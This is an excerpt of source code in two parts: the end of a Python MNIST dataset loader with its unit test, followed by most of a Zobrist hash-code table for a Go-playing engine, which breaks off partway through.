            if len(lbl) != num_lbl:
                raise ValueError(
                    f"Label file declares {num_lbl} items but contains {len(lbl)}")
        with open(fname_img, 'rb') as fimg:
            magic, num, rows, cols = struct.unpack(">IIII", fimg.read(16))
            if magic != cls._IMAGE_MAGIC:
                raise ValueError(f"Bad image-file magic {magic} in {fname_img}")
            if num != len(lbl):
                raise ValueError(f"Image count {num} != label count {len(lbl)}")
            img = np.fromfile(fimg, dtype=np.uint8).reshape(len(lbl), rows, cols)
        return img, lbl
#
# Unit Tests.
#
class TestMNISTLoader(unittest.TestCase):
    """Smoke tests for MNistLoader."""
    #
    # Test Image Load.
    #
    def test_0(self):
        """Load the training split and check the expected 60000x28x28 shape.

        NOTE(review): depends on a hard-coded, machine-specific Windows
        path — this test fails on any machine where the dataset is not
        at exactly that location; consider an env var or skip condition.
        """
        ml = MNistLoader()
        img, lbl = ml.read_mnist(training=True,
                                 path="C:\\Users\\Admin_2\\Google Drive\\DataSets")
        # Images: (num_samples, rows, cols) for the 60k training split.
        s = np.shape(img)
        self.assertEqual(len(s), 3)
        self.assertEqual(s[0], 60000)
        self.assertEqual(s[1], 28)
        self.assertEqual(s[2], 28)
        # Labels: one per image.
        s = np.shape(lbl)
        self.assertEqual(len(s), 1)
        self.assertEqual(s[0], 60000)
        return
#
# Execute the UnitTests.
#
if __name__ == "__main__":
    # Build the suite from the TestCase class itself. The original passed a
    # TestCase *instance* to loadTestsFromModule, which only worked by
    # accident: dir(instance) exposes __class__, through which the loader
    # found the class. loadTestsFromTestCase is the explicit, supported way.
    suite = unittest.TestLoader().loadTestsFromTestCase(TestMNISTLoader)
    unittest.TextTestRunner().run(suite)
| 1,872 | 685 |
from .gotypes import Player, Point
__all__ = ['HASH_CODE', 'EMPTY_BOARD']
HASH_CODE = {
(Point(row=1, col=1), Player.black): 5769035980899136028,
(Point(row=1, col=1), Player.white): 4195353792250980257,
(Point(row=1, col=2), Player.black): 2939556709560817954,
(Point(row=1, col=2), Player.white): 7708149279972756940,
(Point(row=1, col=3), Player.black): 7988678547803188226,
(Point(row=1, col=3), Player.white): 4655957553841539011,
(Point(row=1, col=4), Player.black): 8212044857501010895,
(Point(row=1, col=4), Player.white): 4872061569365492854,
(Point(row=1, col=5), Player.black): 2379681802598189143,
(Point(row=1, col=5), Player.white): 6864125290938038514,
(Point(row=1, col=6), Player.black): 5167707775397193164,
(Point(row=1, col=6), Player.white): 7743213685658051850,
(Point(row=1, col=7), Player.black): 2222727314644120210,
(Point(row=1, col=7), Player.white): 427285564481781851,
(Point(row=1, col=8), Player.black): 6107598394475672768,
(Point(row=1, col=8), Player.white): 6307049205504825109,
(Point(row=1, col=9), Player.black): 6874945384043361005,
(Point(row=1, col=9), Player.white): 3732564701787158093,
(Point(row=1, col=10), Player.black): 3883381806354027664,
(Point(row=1, col=10), Player.white): 7060016586773584112,
(Point(row=1, col=11), Player.black): 4174985115031737431,
(Point(row=1, col=11), Player.white): 8930518714559891444,
(Point(row=1, col=12), Player.black): 3893048938418591093,
(Point(row=1, col=12), Player.white): 7841147957307715476,
(Point(row=1, col=13), Player.black): 8516544479021506378,
(Point(row=1, col=13), Player.white): 2783921672633682732,
(Point(row=1, col=14), Player.black): 1191345934938865717,
(Point(row=1, col=14), Player.white): 6911192133451606875,
(Point(row=1, col=15), Player.black): 2519872149991678056,
(Point(row=1, col=15), Player.white): 8561768391883077189,
(Point(row=1, col=16), Player.black): 6884539456222258472,
(Point(row=1, col=16), Player.white): 5355059437980732087,
(Point(row=1, col=17), Player.black): 6060464869033661655,
(Point(row=1, col=17), Player.white): 5614909820479001861,
(Point(row=1, col=18), Player.black): 3787301363732739064,
(Point(row=1, col=18), Player.white): 4975010203534354120,
(Point(row=1, col=19), Player.black): 4624130766194895106,
(Point(row=1, col=19), Player.white): 5296415352916558483,
(Point(row=2, col=1), Player.black): 8830643134143001245,
(Point(row=2, col=1), Player.white): 7250367917558052665,
(Point(row=2, col=2), Player.black): 8708716694644165206,
(Point(row=2, col=2), Player.white): 4944601016522489638,
(Point(row=2, col=3), Player.black): 2924412846921872712,
(Point(row=2, col=3), Player.white): 8270637900583140993,
(Point(row=2, col=4), Player.black): 2237197181614672186,
(Point(row=2, col=4), Player.white): 1457486289196979118,
(Point(row=2, col=5), Player.black): 3193682865604242403,
(Point(row=2, col=5), Player.white): 6907561651011366711,
(Point(row=2, col=6), Player.black): 7562139104010148646,
(Point(row=2, col=6), Player.white): 644177766712470342,
(Point(row=2, col=7), Player.black): 1849636870230193624,
(Point(row=2, col=7), Player.white): 4262074061500750718,
(Point(row=2, col=8), Player.black): 7046352651358370609,
(Point(row=2, col=8), Player.white): 725075218925363539,
(Point(row=2, col=9), Player.black): 2936893550308581851,
(Point(row=2, col=9), Player.white): 8013681660331642168,
(Point(row=2, col=10), Player.black): 231201466957437056,
(Point(row=2, col=10), Player.white): 4586538242774448548,
(Point(row=2, col=11), Player.black): 7417156086330733955,
(Point(row=2, col=11), Player.white): 5709088051075674894,
(Point(row=2, col=12), Player.black): 465763212277965423,
(Point(row=2, col=12), Player.white): 3218025695418009095,
(Point(row=2, col=13), Player.black): 6127325164692593481,
(Point(row=2, col=13), Player.white): 7158040026257574189,
(Point(row=2, col=14), Player.black): 5807819310182877254,
(Point(row=2, col=14), Player.white): 2357640313516560837,
(Point(row=2, col=15), Player.black): 4392161512180678464,
(Point(row=2, col=15), Player.white): 5109997213166995568,
(Point(row=2, col=16), Player.black): 5140506148394224314,
(Point(row=2, col=16), Player.white): 3144375931646556770,
(Point(row=2, col=17), Player.black): 4684159959070068387,
(Point(row=2, col=17), Player.white): 4343207205761436375,
(Point(row=2, col=18), Player.black): 8614722190417309898,
(Point(row=2, col=18), Player.white): 2108512489805245428,
(Point(row=2, col=19), Player.black): 2492604824966279150,
(Point(row=2, col=19), Player.white): 5284943168978586313,
(Point(row=3, col=1), Player.black): 6687736921226174162,
(Point(row=3, col=1), Player.white): 3033026816527371392,
(Point(row=3, col=2), Player.black): 7807767080953708,
(Point(row=3, col=2), Player.white): 8904849863552960659,
(Point(row=3, col=3), Player.black): 8624685131842709143,
(Point(row=3, col=3), Player.white): 2258480536733385455,
(Point(row=3, col=4), Player.black): 1846270564501507004,
(Point(row=3, col=4), Player.white): 6957287679008487447,
(Point(row=3, col=5), Player.black): 7574591243884459255,
(Point(row=3, col=5), Player.white): 6936980838498116621,
(Point(row=3, col=6), Player.black): 9041336246058590868,
(Point(row=3, col=6), Player.white): 1243006310742637368,
(Point(row=3, col=7), Player.black): 2030412760449406396,
(Point(row=3, col=7), Player.white): 6746733001722822212,
(Point(row=3, col=8), Player.black): 5516725271195575475,
(Point(row=3, col=8), Player.white): 6871907922252452884,
(Point(row=3, col=9), Player.black): 7988789914006526853,
(Point(row=3, col=9), Player.white): 4992865987635107091,
(Point(row=3, col=10), Player.black): 1287049815926143285,
(Point(row=3, col=10), Player.white): 7230341405235329595,
(Point(row=3, col=11), Player.black): 9170686368021133813,
(Point(row=3, col=11), Player.white): 5983613942214390568,
(Point(row=3, col=12), Player.black): 3680920048319877524,
(Point(row=3, col=12), Player.white): 1868642379829096041,
(Point(row=3, col=13), Player.black): 4577756177226098183,
(Point(row=3, col=13), Player.white): 6482949555716818546,
(Point(row=3, col=14), Player.black): 4432260459496503522,
(Point(row=3, col=14), Player.white): 134287453159092786,
(Point(row=3, col=15), Player.black): 6748597881968077794,
(Point(row=3, col=15), Player.white): 8304978460888895085,
(Point(row=3, col=16), Player.black): 5034832418858488579,
(Point(row=3, col=16), Player.white): 5867831665303543268,
(Point(row=3, col=17), Player.black): 8637644441019934841,
(Point(row=3, col=17), Player.white): 2218345499919583684,
(Point(row=3, col=18), Player.black): 1868740838611032911,
(Point(row=3, col=18), Player.white): 790388399063124043,
(Point(row=3, col=19), Player.black): 7258777126631351725,
(Point(row=3, col=19), Player.white): 8311567588415987017,
(Point(row=4, col=1), Player.black): 8655871657246391142,
(Point(row=4, col=1), Player.white): 4003570665308894924,
(Point(row=4, col=2), Player.black): 1534335101597226060,
(Point(row=4, col=2), Player.white): 267487761651261389,
(Point(row=4, col=3), Player.black): 4223543087760139203,
(Point(row=4, col=3), Player.white): 182109920959310,
(Point(row=4, col=4), Player.black): 8084107767590670313,
(Point(row=4, col=4), Player.white): 8255748124676625790,
(Point(row=4, col=5), Player.black): 3895136419213143922,
(Point(row=4, col=5), Player.white): 5717824502593724541,
(Point(row=4, col=6), Player.black): 4568987985832857882,
(Point(row=4, col=6), Player.white): 7859221258306423825,
(Point(row=4, col=7), Player.black): 9092556190419510056,
(Point(row=4, col=7), Player.white): 6521782839350825899,
(Point(row=4, col=8), Player.black): 1983705540554708178,
(Point(row=4, col=8), Player.white): 5980370895146848165,
(Point(row=4, col=9), Player.black): 8655187985569625378,
(Point(row=4, col=9), Player.white): 1543612971427466247,
(Point(row=4, col=10), Player.black): 4924869653703577346,
(Point(row=4, col=10), Player.white): 8266635585980953678,
(Point(row=4, col=11), Player.black): 2650000752898571353,
(Point(row=4, col=11), Player.white): 1409035678742917605,
(Point(row=4, col=12), Player.black): 1260398788900668280,
(Point(row=4, col=12), Player.white): 749836172628892870,
(Point(row=4, col=13), Player.black): 735222828603024315,
(Point(row=4, col=13), Player.white): 389175700405472516,
(Point(row=4, col=14), Player.black): 7750583341552576950,
(Point(row=4, col=14), Player.white): 1084583276510855981,
(Point(row=4, col=15), Player.black): 8950223508066684513,
(Point(row=4, col=15), Player.white): 3394313087104282258,
(Point(row=4, col=16), Player.black): 4035202993116651489,
(Point(row=4, col=16), Player.white): 6444753666473218234,
(Point(row=4, col=17), Player.black): 6191091259124973151,
(Point(row=4, col=17), Player.white): 4568661774202931640,
(Point(row=4, col=18), Player.black): 8377152653943623717,
(Point(row=4, col=18), Player.white): 281053282493097273,
(Point(row=4, col=19), Player.black): 722312087170941568,
(Point(row=4, col=19), Player.white): 3770416326773712553,
(Point(row=5, col=1), Player.black): 881568007992847126,
(Point(row=5, col=1), Player.white): 1071479720133150263,
(Point(row=5, col=2), Player.black): 2734842616646461308,
(Point(row=5, col=2), Player.white): 5892272072509084584,
(Point(row=5, col=3), Player.black): 7452892003632361433,
(Point(row=5, col=3), Player.white): 175455556324312167,
(Point(row=5, col=4), Player.black): 9122918462680814030,
(Point(row=5, col=4), Player.white): 7275574168578359815,
(Point(row=5, col=5), Player.black): 8768791668149437127,
(Point(row=5, col=5), Player.white): 1967856787282759876,
(Point(row=5, col=6), Player.black): 6604284198424850968,
(Point(row=5, col=6), Player.white): 1174154004537023726,
(Point(row=5, col=7), Player.black): 6452192423795075276,
(Point(row=5, col=7), Player.white): 3541795513621095011,
(Point(row=5, col=8), Player.black): 1379518575672960476,
(Point(row=5, col=8), Player.white): 736020849783721871,
(Point(row=5, col=9), Player.black): 2383331116205637426,
(Point(row=5, col=9), Player.white): 9036004825775330000,
(Point(row=5, col=10), Player.black): 1694282667018465060,
(Point(row=5, col=10), Player.white): 758572437702507525,
(Point(row=5, col=11), Player.black): 2908242914232441245,
(Point(row=5, col=11), Player.white): 2142578331638016033,
(Point(row=5, col=12), Player.black): 3225462241019099222,
(Point(row=5, col=12), Player.white): 1002875481627407613,
(Point(row=5, col=13), Player.black): 2214504485761078962,
(Point(row=5, col=13), Player.white): 8216379778152464841,
(Point(row=5, col=14), Player.black): 5375796855652168678,
(Point(row=5, col=14), Player.white): 329860269971523138,
(Point(row=5, col=15), Player.black): 7886091177195383982,
(Point(row=5, col=15), Player.white): 797819299044829558,
(Point(row=5, col=16), Player.black): 6466347384990221784,
(Point(row=5, col=16), Player.white): 6905427095442339981,
(Point(row=5, col=17), Player.black): 5553887868700183760,
(Point(row=5, col=17), Player.white): 2024303718996643653,
(Point(row=5, col=18), Player.black): 2268405412180982822,
(Point(row=5, col=18), Player.white): 8579819472103256939,
(Point(row=5, col=19), Player.black): 1487737534858655612,
(Point(row=5, col=19), Player.white): 1184467737056931418,
(Point(row=6, col=1), Player.black): 61002440362941735,
(Point(row=6, col=1), Player.white): 4901792894231739612,
(Point(row=6, col=2), Player.black): 8046731073102176345,
(Point(row=6, col=2), Player.white): 5985205458497701577,
(Point(row=6, col=3), Player.black): 6585429054420854987,
(Point(row=6, col=3), Player.white): 3819740592142356174,
(Point(row=6, col=4), Player.black): 4108234244147519861,
(Point(row=6, col=4), Player.white): 253627228817355965,
(Point(row=6, col=5), Player.black): 3868800318384240802,
(Point(row=6, col=5), Player.white): 2783904588459497971,
(Point(row=6, col=6), Player.black): 4996704236644226891,
(Point(row=6, col=6), Player.white): 3944869574058700771,
(Point(row=6, col=7), Player.black): 9062875838227781187,
(Point(row=6, col=7), Player.white): 5205881991777395348,
(Point(row=6, col=8), Player.black): 3753904443000638174,
(Point(row=6, col=8), Player.white): 3911447964081555885,
(Point(row=6, col=9), Player.black): 6249187897693375630,
(Point(row=6, col=9), Player.white): 6766154033107228322,
(Point(row=6, col=10), Player.black): 2937577797378456600,
(Point(row=6, col=10), Player.white): 561700528830587831,
(Point(row=6, col=11), Player.black): 2139634236825316312,
(Point(row=6, col=11), Player.white): 4963573584552823594,
(Point(row=6, col=12), Player.black): 7055991601690284531,
(Point(row=6, col=12), Player.white): 3426039060394626150,
(Point(row=6, col=13), Player.black): 4553988720258523568,
(Point(row=6, col=13), Player.white): 2871751622729869916,
(Point(row=6, col=14), Player.black): 4427697958201878411,
(Point(row=6, col=14), Player.white): 7487346359005374192,
(Point(row=6, col=15), Player.black): 4798775123725289136,
(Point(row=6, col=15), Player.white): 2173034517007185759,
(Point(row=6, col=16), Player.black): 7862288536745854735,
(Point(row=6, col=16), Player.white): 4671207854001703523,
(Point(row=6, col=17), Player.black): 1825335494099951543,
(Point(row=6, col=17), Player.white): 4121129076466827577,
(Point(row=6, col=18), Player.black): 6436046063825483859,
(Point(row=6, col=18), Player.white): 1834900058002436833,
(Point(row=6, col=19), Player.black): 3311430872804768965,
(Point(row=6, col=19), Player.white): 7093693406397094845,
(Point(row=7, col=1), Player.black): 4416485833806275197,
(Point(row=7, col=1), Player.white): 5993208992595429873,
(Point(row=7, col=2), Player.black): 5738471850928603526,
(Point(row=7, col=2), Player.white): 2830817747590138158,
(Point(row=7, col=3), Player.black): 2049678311127187953,
(Point(row=7, col=3), Player.white): 1932137151241309826,
(Point(row=7, col=4), Player.black): 1284436241322849671,
(Point(row=7, col=4), Player.white): 959331834338762764,
(Point(row=7, col=5), Player.black): 1698232794071722157,
(Point(row=7, col=5), Player.white): 1500018031169518662,
(Point(row=7, col=6), Player.black): 6309046003087442398,
(Point(row=7, col=6), Player.white): 5124403861392948132,
(Point(row=7, col=7), Player.black): 8557161202716387521,
(Point(row=7, col=7), Player.white): 482659382834075915,
(Point(row=7, col=8), Player.black): 7243993118660063854,
(Point(row=7, col=8), Player.white): 7869935430995650068,
(Point(row=7, col=9), Player.black): 1000281396074482607,
(Point(row=7, col=9), Player.white): 6297071952110244007,
(Point(row=7, col=10), Player.black): 4244408650697127458,
(Point(row=7, col=10), Player.white): 1077927145063207720,
(Point(row=7, col=11), Player.black): 7644383986516919589,
(Point(row=7, col=11), Player.white): 5539105510784036476,
(Point(row=7, col=12), Player.black): 4843660928143156500,
(Point(row=7, col=12), Player.white): 7835615502700745042,
(Point(row=7, col=13), Player.black): 6653458592888229760,
(Point(row=7, col=13), Player.white): 608623951719446882,
(Point(row=7, col=14), Player.black): 1792490758753159288,
(Point(row=7, col=14), Player.white): 3842170905282003864,
(Point(row=7, col=15), Player.black): 5523875932800630513,
(Point(row=7, col=15), Player.white): 175888417098849283,
(Point(row=7, col=16), Player.black): 8044924535185994069,
(Point(row=7, col=16), Player.white): 5793447474918626947,
(Point(row=7, col=17), Player.black): 6520459195516472973,
(Point(row=7, col=17), Player.white): 8392728481711258360,
(Point(row=7, col=18), Player.black): 4465391501229234548,
(Point(row=7, col=18), Player.white): 6773263707028048535,
(Point(row=7, col=19), Player.black): 4488224987414049576,
(Point(row=7, col=19), Player.white): 8652577587208692758,
(Point(row=8, col=1), Player.black): 3004723972424860711,
(Point(row=8, col=1), Player.white): 6688090241666099884,
(Point(row=8, col=2), Player.black): 173852074517437683,
(Point(row=8, col=2), Player.white): 1255512452365432108,
(Point(row=8, col=3), Player.black): 3644060836071363132,
(Point(row=8, col=3), Player.white): 2608781899807400496,
(Point(row=8, col=4), Player.black): 6767891026415985248,
(Point(row=8, col=4), Player.white): 3467324763608485490,
(Point(row=8, col=5), Player.black): 6089341814248388360,
(Point(row=8, col=5), Player.white): 7888854541547534044,
(Point(row=8, col=6), Player.black): 6867328208650830718,
(Point(row=8, col=6), Player.white): 3254996933602040882,
(Point(row=8, col=7), Player.black): 3132634440751793234,
(Point(row=8, col=7), Player.white): 9223192912662878517,
(Point(row=8, col=8), Player.black): 8461849134586001501,
(Point(row=8, col=8), Player.white): 6785052822319298229,
(Point(row=8, col=9), Player.black): 316486289063193398,
(Point(row=8, col=9), Player.white): 2678944512943086531,
(Point(row=8, col=10), Player.black): 6112436031466420565,
(Point(row=8, col=10), Player.white): 481484487812476999,
(Point(row=8, col=11), Player.black): 5558780098474617227,
(Point(row=8, col=11), Player.white): 4515498643014124320,
(Point(row=8, col=12), Player.black): 3148254704783107576,
(Point(row=8, col=12), Player.white): 1132925046259482032,
(Point(row=8, col=13), Player.black): 3867794393643156094,
(Point(row=8, col=13), Player.white): 3430593453848991583,
(Point(row=8, col=14), Player.black): 3808487281108483352,
(Point(row=8, col=14), Player.white): 8558528698193351352,
(Point(row=8, col=15), Player.black): 1221859996451008953,
(Point(row=8, col=15), Player.white): 8348828709569243206,
(Point(row=8, col=16), Player.black): 9201324552950804067,
(Point(row=8, col=16), Player.white): 1448578628667060036,
(Point(row=8, col=17), Player.black): 1454827388443741974,
(Point(row=8, col=17), Player.white): 8057275312324248471,
(Point(row=8, col=18), Player.black): 7325702097722803218,
(Point(row=8, col=18), Player.white): 5140847388271146314,
(Point(row=8, col=19), Player.black): 6756098593295647931,
(Point(row=8, col=19), Player.white): 7991832158773563518,
(Point(row=9, col=1), Player.black): 2539290635541201805,
(Point(row=9, col=1), Player.white): 8437611497531923952,
(Point(row=9, col=2), Player.black): 852452633754271273,
(Point(row=9, col=2), Player.white): 323074703916458579,
(Point(row=9, col=3), Player.black): 9131703106000486321,
(Point(row=9, col=3), Player.white): 8764904479550868077,
(Point(row=9, col=4), Player.black): 3096840760956633597,
(Point(row=9, col=4), Player.white): 5814507543016751268,
(Point(row=9, col=5), Player.black): 2379792443241085277,
(Point(row=9, col=5), Player.white): 6396796748033360003,
(Point(row=9, col=6), Player.black): 1782231465241809120,
(Point(row=9, col=6), Player.white): 345767461848252606,
(Point(row=9, col=7), Player.black): 2874613619832946383,
(Point(row=9, col=7), Player.white): 2294607763040053819,
(Point(row=9, col=8), Player.black): 5178250685268040999,
(Point(row=9, col=8), Player.white): 3364679157508528694,
(Point(row=9, col=9), Player.black): 3553967243152693124,
(Point(row=9, col=9), Player.white): 3068058057478630282,
(Point(row=9, col=10), Player.black): 6184238169682215319,
(Point(row=9, col=10), Player.white): 532168233786036918,
(Point(row=9, col=11), Player.black): 3092733305208152615,
(Point(row=9, col=11), Player.white): 8489026477172734834,
(Point(row=9, col=12), Player.black): 8466596885845881353,
(Point(row=9, col=12), Player.white): 233550669275107378,
(Point(row=9, col=13), Player.black): 8603581440897487625,
(Point(row=9, col=13), Player.white): 9034915872764336272,
(Point(row=9, col=14), Player.black): 8064684217439572746,
(Point(row=9, col=14), Player.white): 5194590206921700316,
(Point(row=9, col=15), Player.black): 4306432062946416892,
(Point(row=9, col=15), Player.white): 2309616088345580816,
(Point(row=9, col=16), Player.black): 8258188514420365838,
(Point(row=9, col=16), Player.white): 6138395356060930650,
(Point(row=9, col=17), Player.black): 6672053316594332959,
(Point(row=9, col=17), Player.white): 3638024551847104885,
(Point(row=9, col=18), Player.black): 5720854717145016673,
(Point(row=9, col=18), Player.white): 1549651879493766372,
(Point(row=9, col=19), Player.black): 5340785436349693495,
(Point(row=9, col=19), Player.white): 2405856358043503939,
(Point(row=10, col=1), Player.black): 6012164709255398847,
(Point(row=10, col=1), Player.white): 812907851686256787,
(Point(row=10, col=2), Player.black): 7949402815097777999,
(Point(row=10, col=2), Player.white): 4758655524963025727,
(Point(row=10, col=3), Player.black): 2008566195663888707,
(Point(row=10, col=3), Player.white): 5225240679930537767,
(Point(row=10, col=4), Player.black): 6015740187305539517,
(Point(row=10, col=4), Player.white): 4186688677666698354,
(Point(row=10, col=5), Player.black): 5719852225235663443,
(Point(row=10, col=5), Player.white): 826011302979319411,
(Point(row=10, col=6), Player.black): 8242258740436620776,
(Point(row=10, col=6), Player.white): 6778969168835768563,
(Point(row=10, col=7), Player.black): 1649291342741470337,
(Point(row=10, col=7), Player.white): 8384196651020892748,
(Point(row=10, col=8), Player.black): 3219805316829239618,
(Point(row=10, col=8), Player.white): 6596907969102854814,
(Point(row=10, col=9), Player.black): 962723493104342355,
(Point(row=10, col=9), Player.white): 8968650977280178689,
(Point(row=10, col=10), Player.black): 1468664499759050832,
(Point(row=10, col=10), Player.white): 914485010029843310,
(Point(row=10, col=11), Player.black): 8501539474215164558,
(Point(row=10, col=11), Player.white): 8798578597941390750,
(Point(row=10, col=12), Player.black): 329776455727647811,
(Point(row=10, col=12), Player.white): 6706312749522123953,
(Point(row=10, col=13), Player.black): 9203013348898942872,
(Point(row=10, col=13), Player.white): 1188765220685651133,
(Point(row=10, col=14), Player.black): 912994098216386387,
(Point(row=10, col=14), Player.white): 1842201333713261434,
(Point(row=10, col=15), Player.black): 6041960408571691593,
(Point(row=10, col=15), Player.white): 6450489929744294489,
(Point(row=10, col=16), Player.black): 1169223709141443575,
(Point(row=10, col=16), Player.white): 1357962677395804436,
(Point(row=10, col=17), Player.black): 4646077370747128681,
(Point(row=10, col=17), Player.white): 3704161794426167131,
(Point(row=10, col=18), Player.black): 4573468167625885166,
(Point(row=10, col=18), Player.white): 6511588956916800774,
(Point(row=10, col=19), Player.black): 4329635167829691310,
(Point(row=10, col=19), Player.white): 4923893081858853917,
(Point(row=11, col=1), Player.black): 4811888116128159477,
(Point(row=11, col=1), Player.white): 718588455940040384,
(Point(row=11, col=2), Player.black): 7674812639233200986,
(Point(row=11, col=2), Player.white): 4331023918212183699,
(Point(row=11, col=3), Player.black): 3897432141041501556,
(Point(row=11, col=3), Player.white): 7276519453137688286,
(Point(row=11, col=4), Player.black): 6510030071580938266,
(Point(row=11, col=4), Player.white): 8357803872914616079,
(Point(row=11, col=5), Player.black): 1733557852229300439,
(Point(row=11, col=5), Player.white): 1887858117103523412,
(Point(row=11, col=6), Player.black): 2050309162712522735,
(Point(row=11, col=6), Player.white): 5134667517624134734,
(Point(row=11, col=7), Player.black): 1935323196572736143,
(Point(row=11, col=7), Player.white): 823776149897020121,
(Point(row=11, col=8), Player.black): 5183697550720478054,
(Point(row=11, col=8), Player.white): 2806161877752714854,
(Point(row=11, col=9), Player.black): 639365824564049855,
(Point(row=11, col=9), Player.white): 3105484068242501121,
(Point(row=11, col=10), Player.black): 8892143254196528380,
(Point(row=11, col=10), Player.white): 5166469057964800694,
(Point(row=11, col=11), Player.black): 292605160015608161,
(Point(row=11, col=11), Player.white): 7514567951599881472,
(Point(row=11, col=12), Player.black): 5109949366761472505,
(Point(row=11, col=12), Player.white): 310762339342946547,
(Point(row=11, col=13), Player.black): 2104946795875927320,
(Point(row=11, col=13), Player.white): 1235460730147809452,
(Point(row=11, col=14), Player.black): 2127497427209123011,
(Point(row=11, col=14), Player.white): 7161002026604519025,
(Point(row=11, col=15), Player.black): 59233478003238444,
(Point(row=11, col=15), Player.white): 5970353674800714203,
(Point(row=11, col=16), Player.black): 6665616474731630602,
(Point(row=11, col=16), Player.white): 152650024831436796,
(Point(row=11, col=17), Player.black): 934842009288313548,
(Point(row=11, col=17), Player.white): 8355856797725665648,
(Point(row=11, col=18), Player.black): 1477828799968727451,
(Point(row=11, col=18), Player.white): 2901806850750856486,
(Point(row=11, col=19), Player.black): 7573653378761984057,
(Point(row=11, col=19), Player.white): 7716881570339655225,
(Point(row=12, col=1), Player.black): 2568918803525316736,
(Point(row=12, col=1), Player.white): 5628114972944723995,
(Point(row=12, col=2), Player.black): 4423011986110571904,
(Point(row=12, col=2), Player.white): 1004637634072591177,
(Point(row=12, col=3), Player.black): 5461707783998271703,
(Point(row=12, col=3), Player.white): 638790804607383716,
(Point(row=12, col=4), Player.black): 2724719862170090354,
(Point(row=12, col=4), Player.white): 4421566525462598702,
(Point(row=12, col=5), Player.black): 8648906312566693100,
(Point(row=12, col=5), Player.white): 8270055473898685871,
(Point(row=12, col=6), Player.black): 1915749061367669068,
(Point(row=12, col=6), Player.white): 4876832281198499170,
(Point(row=12, col=7), Player.black): 46140495477523623,
(Point(row=12, col=7), Player.white): 5007714131133085886,
(Point(row=12, col=8), Player.black): 8743444844221333325,
(Point(row=12, col=8), Player.white): 908456928534611497,
(Point(row=12, col=9), Player.black): 6983096771564974099,
(Point(row=12, col=9), Player.white): 7430779576557722399,
(Point(row=12, col=10), Player.black): 3152448216524677614,
(Point(row=12, col=10), Player.white): 3180436423603504440,
(Point(row=12, col=11), Player.black): 5269207326232247596,
(Point(row=12, col=11), Player.white): 9212597296607879019,
(Point(row=12, col=12), Player.black): 7233784749342434823,
(Point(row=12, col=12), Player.white): 5359592143185856960,
(Point(row=12, col=13), Player.black): 4245159514132041091,
(Point(row=12, col=13), Player.white): 7483203165114225163,
(Point(row=12, col=14), Player.black): 2594209199301730105,
(Point(row=12, col=14), Player.white): 4330511663839218487,
(Point(row=12, col=15), Player.black): 1756401805040965301,
(Point(row=12, col=15), Player.white): 8443740481163251139,
(Point(row=12, col=16), Player.black): 8532686399133135373,
(Point(row=12, col=16), Player.white): 8648108130553396024,
(Point(row=12, col=17), Player.black): 9029748126466626304,
(Point(row=12, col=17), Player.white): 366767265422515200,
(Point(row=12, col=18), Player.black): 5634370494228795321,
(Point(row=12, col=18), Player.white): 3028166990928692045,
(Point(row=12, col=19), Player.black): 6128886499703201992,
(Point(row=12, col=19), Player.white): 7223805971713766564,
(Point(row=13, col=1), Player.black): 2496253901433903144,
(Point(row=13, col=1), Player.white): 1551493066650163627,
(Point(row=13, col=2), Player.black): 2672840148010019750,
(Point(row=13, col=2), Player.white): 5994868224347809475,
(Point(row=13, col=3), Player.black): 4628383235437429108,
(Point(row=13, col=3), Player.white): 6064829097099335572,
(Point(row=13, col=4), Player.black): 5413486961964612412,
(Point(row=13, col=4), Player.white): 4045128829439945174,
(Point(row=13, col=5), Player.black): 4712295427500302995,
(Point(row=13, col=5), Player.white): 248402942764617862,
(Point(row=13, col=6), Player.black): 999667821658964017,
(Point(row=13, col=6), Player.white): 8820974176258972514,
(Point(row=13, col=7), Player.black): 3476986111144434482,
(Point(row=13, col=7), Player.white): 7942783663244623527,
(Point(row=13, col=8), Player.black): 4234845736483310370,
(Point(row=13, col=8), Player.white): 4216551395056226649,
(Point(row=13, col=9), Player.black): 177265600322039330,
(Point(row=13, col=9), Player.white): 8990080846893998186,
(Point(row=13, col=10), Player.black): 3147286474627477037,
(Point(row=13, col=10), Player.white): 6471007499395169134,
(Point(row=13, col=11), Player.black): 1936045838813747550,
(Point(row=13, col=11), Player.white): 4644151093964356408,
(Point(row=13, col=12), Player.black): 4435131806849743185,
(Point(row=13, col=12), Player.white): 54569717782380574,
(Point(row=13, col=13), Player.black): 1508359860504878315,
(Point(row=13, col=13), Player.white): 6891830587880295481,
(Point(row=13, col=14), Player.black): 3762684221329973240,
(Point(row=13, col=14), Player.white): 3017599301607054197,
(Point(row=13, col=15), Player.black): 7503851802710739479,
(Point(row=13, col=15), Player.white): 2388026796289288600,
(Point(row=13, col=16), Player.black): 4460949656925498045,
(Point(row=13, col=16), Player.white): 6121498320763557205,
(Point(row=13, col=17), Player.black): 5454912114241197983,
(Point(row=13, col=17), Player.white): 5677909618846838515,
(Point(row=13, col=18), Player.black): 5464352961587447142,
(Point(row=13, col=18), Player.white): 7114550787615396229,
(Point(row=13, col=19), Player.black): 3485712230029563806,
(Point(row=13, col=19), Player.white): 6446897201405604194,
(Point(row=14, col=1), Player.black): 7528920080599778132,
(Point(row=14, col=1), Player.white): 5669940686033599629,
(Point(row=14, col=2), Player.black): 5228752949828262741,
(Point(row=14, col=2), Player.white): 4897727087692140998,
(Point(row=14, col=3), Player.black): 8331520318636135471,
(Point(row=14, col=3), Player.white): 6240564650456223273,
(Point(row=14, col=4), Player.black): 4147571497243833121,
(Point(row=14, col=4), Player.white): 5287851769372107454,
(Point(row=14, col=5), Player.black): 3929856055856918635,
(Point(row=14, col=5), Player.white): 4942395218791830311,
(Point(row=14, col=6), Player.black): 3419131812142225330,
(Point(row=14, col=6), Player.white): 3946706912536054517,
(Point(row=14, col=7), Player.black): 2216854722824718528,
(Point(row=14, col=7), Player.white): 5751840383776158854,
(Point(row=14, col=8), Player.black): 6039954508464465971,
(Point(row=14, col=8), Player.white): 4880067768099333403,
(Point(row=14, col=9), Player.black): 1391277164658920957,
(Point(row=14, col=9), Player.white): 7451285533597502911,
(Point(row=14, col=10), Player.black): 9114931203345433206,
(Point(row=14, col=10), Player.white): 9151177955674363973,
(Point(row=14, col=11), Player.black): 5286716825816304093,
(Point(row=14, col=11), Player.white): 8299991677645306266,
(Point(row=14, col=12), Player.black): 5195464055129666925,
(Point(row=14, col=12), Player.white): 7360092883003763047,
(Point(row=14, col=13), Player.black): 8091126652869256455,
(Point(row=14, col=13), Player.white): 859632643926738720,
(Point(row=14, col=14), Player.black): 1956576428005199048,
(Point(row=14, col=14), Player.white): 3373854362230632022,
(Point(row=14, col=15), Player.black): 6142182356819019331,
(Point(row=14, col=15), Player.white): 599882345282402750,
